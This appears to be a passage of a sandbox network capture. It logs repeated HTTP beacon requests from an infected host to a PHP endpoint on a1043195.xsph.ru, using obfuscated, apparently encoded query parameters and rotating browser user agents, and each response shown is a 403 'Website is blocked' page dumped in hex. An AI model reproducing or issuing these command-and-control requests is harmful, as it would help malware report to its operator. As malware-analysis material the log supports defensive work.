Nov 24, 2024 04:02:49.280906916 CET	1236	IN	Data Raw: 33 43 32 39 38 2e 36 31 39 20 31 30 36 2e 33 20 32 39 36 2e 38 39 38 20 31 30 36 2e 38 37 33 20 32 39 36 2e 33 32 34 20 31 30 37 2e 32 35 35 43 32 39 35 2e 39 34 31 20 31 30 36 2e 38 37 33 20 32 39 34 2e 37 39 34 20 31 30 36 2e 31 31 20 32 39 34 Data Ascii: 3C298.619 106.3 296.898 106.873 296.324 107.255C295.941 106.873 294.794 106.11 294.411 106.11C295.176 104.391 296.324 102.291 294.985 100.572C294.602 99.9991 294.029 99.9991 293.455 100.381C290.395 103.436 287.143 106.491 284.083 109.547C283.8
Nov 24, 2024 04:02:49.280919075 CET	1236	IN	Data Raw: 33 20 34 39 2e 32 30 36 34 20 31 31 37 2e 31 30 38 20 34 38 2e 34 34 32 36 20 31 31 36 2e 39 31 37 20 34 38 2e 34 34 32 36 43 31 30 31 2e 32 33 33 20 34 35 2e 37 36 39 32 20 38 36 2e 38 38 38 35 20 34 38 2e 34 34 32 36 20 37 31 2e 33 39 36 31 20 Data Ascii: 3 49.2064 117.108 48.4426 116.917 48.4426C101.233 45.7692 86.8885 48.4426 71.3961 51.3068C66.997 52.0706 62.4066 53.0254 58.0075 53.9801C57.2424 54.1711 57.0512 55.1258 57.625 55.5077C63.3629 61.4272 69.1009 67.3466 75.0301 73.2661C80.1943 78.
Nov 24, 2024 04:02:49.519912958 CET	1236	IN	Data Raw: 31 31 37 20 31 32 30 2e 38 31 33 20 31 36 2e 36 39 34 32 20 31 32 31 2e 35 37 37 20 31 37 2e 30 37 36 38 20 31 32 32 2e 33 34 43 31 37 2e 34 35 39 33 20 31 32 33 2e 31 30 34 20 31 38 2e 30 33 33 31 20 31 32 33 2e 38 36 38 20 31 38 2e 36 30 36 39 Data Ascii: 117 120.813 16.6942 121.577 17.0768 122.34C17.4593 123.104 18.0331 123.868 18.6069 124.823C17.268 124.632 15.9292 124.823 14.7816 125.014C14.0165 125.205 13.4427 125.396 12.6777 125.586C12.1039 125.777 11.3388 126.159 10.9563 126.732C10.5738 1
Nov 24, 2024 04:02:49.807251930 CET	664	OUT	GET /e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: a1043195.xsph.ru
Nov 24, 2024 04:02:50.245115042 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:02:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.5	49836	141.8.192.93	80

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 04:03:08.944873095 CET	508	OUT	GET /e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: a1043195.xsph.ru Connection: Keep-Alive
Nov 24, 2024 04:03:10.389750004 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:03:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
Nov 24, 2024 04:03:10.389817953 CET	224	IN	Data Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inlin
Nov 24, 2024 04:03:10.389890909 CET	1236	IN	Data Raw: 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 3b 2d Data Ascii: e-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-flex-direction:column;-moz-box-orient:vertical;-moz-box-direction:normal;-ms-flex-direction:column;flex-direction:column}.wra
Nov 24, 2024 04:03:10.389977932 CET	1236	IN	Data Raw: 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 Data Ascii: webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;height:100%;max-width:328px;max-height:384px;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-m
Nov 24, 2024 04:03:10.390006065 CET	1236	IN	Data Raw: 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 33 38 25 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67 Data Ascii: t-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77px}.wrapper .content .right-side{top:unset;bottom:52px;position:a
Nov 24, 2024 04:03:10.390088081 CET	1236	IN	Data Raw: 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 33 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p> <h1 c
Nov 24, 2024 04:03:10.390100956 CET	896	IN	Data Raw: 31 39 39 20 37 34 2e 36 30 32 20 31 38 39 2e 39 38 20 37 33 2e 30 37 34 33 43 31 39 33 2e 38 30 36 20 37 31 2e 39 32 38 36 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34 20 31 39 38 2e 30 31 34 20 36 35 2e 32 34 35 34 43 31 39 38 2e 35 38 37 20 Data Ascii: 199 74.602 189.98 73.0743C193.806 71.9286 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.9985C167.602 98.2799 168.55
Nov 24, 2024 04:03:10.390114069 CET	1236	IN	Data Raw: 20 31 36 33 2e 32 30 33 20 31 30 31 2e 31 34 34 20 31 36 31 2e 38 36 34 20 31 30 31 2e 39 30 38 43 31 36 30 2e 39 30 38 20 31 30 32 2e 34 38 31 20 31 36 31 2e 36 37 33 20 31 30 34 2e 31 39 39 20 31 36 32 2e 38 32 31 20 31 30 33 2e 36 32 37 43 31 Data Ascii: 163.203 101.144 161.864 101.908C160.908 102.481 161.673 104.199 162.821 103.627C165.69 101.908 169.133 101.526 172.193 102.672C173.34 103.054 173.914 101.144 172.767 100.762Z" fill="black"/> <path d="M141.208 97.1331C138.721 99.8064 1
Nov 24, 2024 04:03:10.390125990 CET	1236	IN	Data Raw: 39 2e 39 32 36 20 39 37 2e 35 31 35 36 43 32 30 30 2e 31 31 37 20 39 36 2e 39 34 32 38 20 31 39 39 2e 39 32 36 20 39 36 2e 35 36 30 39 20 31 39 39 2e 33 35 32 20 39 36 2e 33 36 39 39 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 Data Ascii: 9.926 97.5156C200.117 96.9428 199.926 96.5609 199.352 96.3699Z" fill="black"/> <path d="M311.434 112.411C311.816 111.647 311.242 111.074 310.669 110.883C308.756 110.692 307.035 110.501 305.122 110.31C306.652 108.974 308.182 107.446 309
Nov 24, 2024 04:03:10.390139103 CET	1236	IN	Data Raw: 2e 36 39 34 31 43 31 36 33 2e 39 36 38 20 33 34 2e 31 32 31 33 20 31 36 33 2e 35 38 36 20 33 32 2e 35 39 33 37 20 31 36 32 2e 34 33 38 20 33 32 2e 39 37 35 36 43 31 35 37 2e 30 38 33 20 33 35 2e 30 37 36 20 31 35 32 2e 31 31 20 33 37 2e 39 34 30 Data Ascii: .6941C163.968 34.1213 163.586 32.5937 162.438 32.9756C157.083 35.076 152.11 37.9403 147.902 41.9502C147.902 38.7041 147.902 35.4579 147.902 32.2118C147.902 31.448 146.755 30.8751 146.181 31.448C142.547 35.8398 137.956 39.086 132.983 41.9502C13
Nov 24, 2024 04:03:10.509502888 CET	1236	IN	Data Raw: 34 31 43 33 39 2e 30 37 32 33 20 31 32 31 2e 39 35 38 20 33 39 2e 30 37 32 33 20 31 31 37 2e 37 35 38 20 33 39 2e 30 37 32 33 20 31 31 34 2e 33 32 43 33 39 2e 30 37 32 33 20 31 31 33 2e 35 35 37 20 33 38 2e 33 30 37 32 20 31 31 33 2e 31 37 35 20 Data Ascii: 41C39.0723 121.958 39.0723 117.758 39.0723 114.32C39.0723 113.557 38.3072 113.175 37.5421 113.557C34.6732 115.084 32.9518 117.948 32.7605 121.195C32.7605 121.195 32.5692 121.195 32.5692 121.004C28.9352 119.667 25.1099 119.094 21.2846 118.903C2
Nov 24, 2024 04:03:10.838912010 CET	484	OUT	GET /e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: a1043195.xsph.ru
Nov 24, 2024 04:03:11.285563946 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:03:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.5	49878	141.8.192.93	80

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 04:03:28.002429962 CET	544	OUT	GET /e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: a1043195.xsph.ru Connection: Keep-Alive
Nov 24, 2024 04:03:29.339575052 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:03:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
Nov 24, 2024 04:03:29.339637995 CET	224	IN	Data Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inlin
Nov 24, 2024 04:03:29.339673042 CET	1236	IN	Data Raw: 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 3b 2d Data Ascii: e-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-flex-direction:column;-moz-box-orient:vertical;-moz-box-direction:normal;-ms-flex-direction:column;flex-direction:column}.wra
Nov 24, 2024 04:03:29.339741945 CET	1236	IN	Data Raw: 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 Data Ascii: webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;height:100%;max-width:328px;max-height:384px;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-m
Nov 24, 2024 04:03:29.339757919 CET	1236	IN	Data Raw: 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 33 38 25 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67 Data Ascii: t-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77px}.wrapper .content .right-side{top:unset;bottom:52px;position:a
Nov 24, 2024 04:03:29.339829922 CET	1236	IN	Data Raw: 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 33 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p> <h1 c
Nov 24, 2024 04:03:29.339844942 CET	1236	IN	Data Raw: 31 39 39 20 37 34 2e 36 30 32 20 31 38 39 2e 39 38 20 37 33 2e 30 37 34 33 43 31 39 33 2e 38 30 36 20 37 31 2e 39 32 38 36 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34 20 31 39 38 2e 30 31 34 20 36 35 2e 32 34 35 34 43 31 39 38 2e 35 38 37 20 Data Ascii: 199 74.602 189.98 73.0743C193.806 71.9286 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.9985C167.602 98.2799 168.55
Nov 24, 2024 04:03:29.339859962 CET	1236	IN	Data Raw: 34 2e 31 33 31 20 31 30 36 2e 31 30 38 20 31 33 34 2e 35 31 34 20 31 30 35 2e 37 32 36 43 31 33 37 2e 33 38 33 20 31 30 33 2e 34 33 35 20 31 34 30 2e 30 36 20 31 30 30 2e 39 35 32 20 31 34 32 2e 35 34 37 20 39 38 2e 34 36 39 38 43 31 34 33 2e 35 Data Ascii: 4.131 106.108 134.514 105.726C137.383 103.435 140.06 100.952 142.547 98.4698C143.503 97.515 142.164 96.1784 141.208 97.1331Z" fill="black"/> <path d="M139.104 92.3605L128.393 95.6066C127.245 95.9885 127.628 97.7071 128.967 97.5161C132.
Nov 24, 2024 04:03:29.339878082 CET	1236	IN	Data Raw: 33 43 32 39 38 2e 36 31 39 20 31 30 36 2e 33 20 32 39 36 2e 38 39 38 20 31 30 36 2e 38 37 33 20 32 39 36 2e 33 32 34 20 31 30 37 2e 32 35 35 43 32 39 35 2e 39 34 31 20 31 30 36 2e 38 37 33 20 32 39 34 2e 37 39 34 20 31 30 36 2e 31 31 20 32 39 34 Data Ascii: 3C298.619 106.3 296.898 106.873 296.324 107.255C295.941 106.873 294.794 106.11 294.411 106.11C295.176 104.391 296.324 102.291 294.985 100.572C294.602 99.9991 294.029 99.9991 293.455 100.381C290.395 103.436 287.143 106.491 284.083 109.547C283.8
